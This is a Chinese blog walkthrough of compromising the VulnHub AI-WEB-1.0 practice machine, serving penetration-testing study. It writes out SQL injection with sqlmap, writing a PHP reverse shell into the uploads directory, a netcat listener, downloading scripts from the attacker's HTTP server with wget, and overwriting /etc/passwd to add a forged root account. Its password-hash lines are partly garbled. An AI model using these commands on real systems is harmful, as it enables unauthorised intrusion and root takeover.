vulnhub靶场AI-WEB-1.0

最新推荐文章于 2024-03-08 10:05:02 发布
最新推荐文章于 2024-03-08 10:05:02 发布
阅读量572 收藏
点赞数
分类专栏: vulnhub靶机 文章标签: php web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42307546/article/details/124549661
版权

靶机下载地址

https://download.vulnhub.com/aiweb/AI-Web-1.0.7z

主机探测

netdiscover -i eth0 -r 192.168.1.0/24

在这里插入图片描述
端口探测

nmap -p 1-65535 -sC -sV 192.168.1.14

在这里插入图片描述
开启了80端口访问
在这里插入图片描述
web目录爆破

gobuster dir -u http://192.168.1.14 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt -t 50

得到当前有个robots.txt文件,发现两个目录
在这里插入图片描述
对 /m3diNf0/目录进行爆破

gobuster dir -u http://192.168.1.14//m3diNf0/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt -t 50

扫到一个info.php的页面是个phpinfo,得到了它的网站根目录
在这里插入图片描述
/home/www/html/web1x443290o2sdf92213

直接访问se3reTdir777页面
在这里插入图片描述
写了个参数1
在这里插入图片描述
用bp抓下包,并在参数上加了个单引号发现抱错存在sql注入
在这里插入图片描述

把数据包复制下来在注入点加上*

POST //se3reTdir777/ HTTP/1.1
Host: 192.168.1.14
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
Origin: http://192.168.1.14
Connection: close
Referer: http://192.168.1.14//se3reTdir777/
Upgrade-Insecure-Requests: 1

uid=1*&Operation=Submit

用sqlmap进行探测

sqlmap.py -r C:\Users\LiHua\Desktop\3.txt --batch

尝试上传一个php反弹shell到/home/www/html/web1x443290o2sdf92213//se3reTdir777/uploads/目录

sqlmap.py -u http://192.168.1.14//se3reTdir777/# --data "uid=1&Operation=Submit" -v 1 --file-read="/etc/passwd"   --file-write D:\moon.php --file-dest  /home/www/html/web1x443290o2sdf92213//se3reTdir777/uploads/moon.php

上传成功在这里插入图片描述
在kali本地监听6666端口
nc -lvvp 6666
访问192.168.1.14//se3reTdir777/uploads/moon.php
在这里插入图片描述
在kali本地开启一个http服务上传提权辅助脚本
python3 -m http.server 8080
进入tmp目录
cd /tmp
wget http://192.168.1.15:8080/ linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh

这里并没有看到可以利用的exp,试试suid提权

find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述

使用passwd提权首先看下/etc/passwd文件的权限
ls -al /etc/passwd可以看到具有写入权限
在这里插入图片描述
通过OpenSSL passwd生成一个新的用户moonhacker,密码为123456

openssl passwd -1 -salt moonhack 123456

1 1 1moonhack$4o50Z4aoUGaLMC0Rg4Io40

将这段生成的密码写进/etc/passwd最后一行
首先查看/etc/passwd并保存在本地的kali下在把这行密码添加进去
在这里插入图片描述
复制到kali下文件命名为passwd并把将moonhacker:1 11moonhack$4o50Z4aoUGaLMC0Rg4Io40:0:0:/root:/bin/bash追加到passwd中
在这里插入图片描述

覆盖掉目标服务器的passwd文件

wget http://192.168.1.15:8080/passwd -O /etc/passwd

先用python虚拟出一个shell,切换到moonhacker用户

python -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述

qq_42307546
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念验证”部分是由于 Twitter 上提出的有关双因素身份验证和 Linux 的问题以及 @theart42 的建议而产生的。 这一挑战的最终目标是绕过双因素身份验证、获得 root 权限并读取唯一的标志。 除非您尝试通过 SSH 登录,否则您可能甚至不知道已经安装和配置了双因素身份验证,但它确实存在并且正在发挥作用。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来说,Google 可以提供很大的帮助,但您可以随时发推文@DCAU7 寻求帮助,以帮助您重新开始。但请注意:我不会给你答案,相反,我会给你一个如何继续前进的想法。
DVWA靶场环境---新手入坑
10-28
DVWA靶场环境---新手学习web安全的必备靶场之一,DVWA (Dam Vulnerable Web Application)是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。
vulnhub靶机AI-Web-1.0渗透过程
2401_82463993的博客
03-08 864
(根据前面找到的info.php文件暴露的信息,绝对路径选择:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/)下面就是要选择文件路径:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/(info.php里面就是服务器上的PHP配置信息,这个页面会列出PHP版本、服务器操作系统、PHP配置参数等信息)这边有个index.php文件,(这是个网站的默认首页文件)访问一下。
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来说,Google 可以提供很大的帮助,但您可以随时发推文@DCAU7 寻求帮助,以帮助您重新开始。但请注意:我不会给你答案,相反,我会给你一个如何继续前进的想法。
VulnHub20230718最新全部靶场详情 - 共701个靶场信息
07-18
由于本人最近打靶,但是【VulnHub】网站访问总是有些显示问题,靶场信息查找也很不方便,所以本人总结了【VulnHub】上面所有靶场的全部基本信息,方便各位按照自己需求进行搜索查看
phpstudy+靶场sqli-labs-master下载
11-08
phpstudy+靶场sqli-labs-master下载
vulnhub靶机AI-Web-1.0渗透笔记
liver100day的博客
06-10 2156
AI-Web1靶机渗透笔记 靶机环境搭建 攻击渗透机: kali IP地址:192.168.75.128 靶机:AI-Web1 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/ai-web-1,353/ 渗透过程 1.信息收集 1.1 主机发现 netdiscover 使用这条命令来确认目标靶机IP地址 确认目标靶机IP地址:192.168.75.134 1.2 端口扫描 使用端口扫描神器nmap进行扫描 nmap -T4 -sV -O -A -P- 192.1
vulnhub-TED靶场过程记录
m0_59598029的博客
01-31 136
靶场地址:https://download.vulnhub.com/ted/Ted.7z靶场设置 使用VM打开扫描靶场网段,得到ip地址访问网址是个登陆框扫描目录无果后,开始对登录框进行探索。随便输入个密码后,发现密码或者密码hash错误,尝试多样的密码对比图如下看来密码是admin没错了,然后应该是hash加密后访问。这里耗尽了大量的时间,得出来了结果(还是朋友做出来的,难受)这里使用的是sha256加密,然后加密的字符串,字符转换大写在在线网站进行大小写转换一发入魂获得下一步提示。
VulnHub系列』DC-3靶机渗透总结
qq_45300786的博客
12-06 1282
靶机DC-3下载地址:https : //download.vulnhub.com/dc/DC-3.zip 靶机DC-3VMware下载地址:https : //download.vulnhub.com/dc/DC-3VMware.zip 注:开始将DC-3.ova文件导入VMware虚拟机,发现无法获取到靶机IP地址,作者在DC-3靶机下载页面提到可以下载已经搭建好的DC-3VMware,然后导入到VMware中就可以了 描述:从靶机DC-3开始,只有一个最终的flag,只有拿到root权限才可以发现最终
Vulnhub靶机实战——DC-4
冠霖L的博客
09-27 3074
靶机DC-4下载地址:https://download.vulnhub.com/dc/DC-4.zip 描述:从靶机DC-3开始,只有一个入口和一个最终的flag,只有拿到root权限才可以发现最终的flag,DC-4也是一样 环境:Vmware 15 Pro虚拟机软件 DC-4靶机IP地址:192.168.220.138 Kali的IP地址:...
AI: WEB: 2 WP
qq_37410729的博客
04-12 211
可以看出这是一个用户名和密码,不过密码加密了,我么用john来破解一下,这里用的字典就是题目说明里提到的字典了。读了一些文件都是没用的,最后读到了apache的认证文件/etc/apache2/.htpasswd。和1一样捏,拖入VMware打开,然后用kali扫arp得到靶机的ip地址,然后用nmap扫描端口。不过反弹shell和文件上传都失败了,那就翻翻文件吧,但是翻了半天也没翻到有用的,可能有隐藏文件吧。那应该是别的地方的了。扫到一个webadmin目录,而且需要登陆,试一下刚才的账户,成功登录。
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
vulnhub靶场实战系列-DC-3实战
最新发布
05-20
vulnhub靶场实战系列-DC-3实战
vulnhub靶场实战系列-DC-1实战流程图
05-17
AI-WEB-1.0靶机教程
qq_42553928的博客
04-06 6111
文章目录靶机概况下载地址靶机描述Description靶机信息靶机界面网卡信息信息收集主机发现端口扫描命令过程端口详情网站信息网站首页目录爆破敏感目录扫描m3diNf0目录se3reTdir777目录漏洞映射SQLI渗透过程SQLI漏洞利用查看我是谁创建一个名为webshell.php的文件下载文件到靶机运行上传的文件提权 靶机概况 下载地址 https://www.vulnhub.com/entry/ai-web-1,353/ 靶机描述 Description Difficulty: Intermedi
AI-WEB-1.0简单攻略
在Web和Reverse坑里游泳中。。。。
07-17 2378
AI-WEB-1.0靶机的简单攻略
Vulnhub-keyring靶机
lionwerson的博客
12-06 3008
keyring下载地址https://download.vulnhub.com/ia/keyring-v1.01.ova1.下载靶机,网络改为桥接模式然后打开靶机,nmap扫描一下: nmap.exe -p- 192.168.0.15 开放ssh的22端口和http的80端口,ssh端口无法登录,设置了只能用密钥登录。 先注册一个用户,admin用户显示已经被注册了,只能换一个注册: 后台非常简陋,看来不是cms,路径扫描找到一个history.php的文件。 histor.
vulnhub-Momentum2
plant1234的博客
08-30 500
vulnhub-Momentum2靶机 首先先去下载靶机地址: https://download.vulnhub.com/momentum/Momentum2.ova 下载完靶机,直接利用VMave导入打开 一,信息收集 首先确定自己的靶机为net模式,知道自己靶机所在网段 然后利用kali进行IP扫描: nmap -sP 192.168.229.0/24 发现存活的IP,除去自己的IP 发现靶机IP:192.168.229.155 如果不能扫描出IP就查看这篇博客: https://hackergu.
vulnhub之ICA1靶机
lionwerson的博客
11-24 3017
https://download.vulnhub.com/ica/ica1.ziphttp://ICA-1靶机下载1.下载靶机,virtualbox网络改为桥接模式,然后开机: 2.nmap扫描一下端口: nmap 192.168.0.11 -p- 有80端口和22端口,先从web端入手: 是一个登录界面,用电子邮箱和用户名登录,不打算先用暴力破解,先sqlmap跑一下: python sqlmap.py -r 1.txt 不过好像不存在sql注入,只能另辟蹊径,这个是一..
vulnhub靶场通关
09-09
vulnhub靶场是一个用于学习和测试网络安全技能的平台。通关vulnhub靶场需要进行一系列的渗透测试和漏洞利用操作。根据引用中提供的目录,以下是一个通关vulnhub靶场的大致步骤: 1. 环境搭建:下载靶场环境,并启动...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值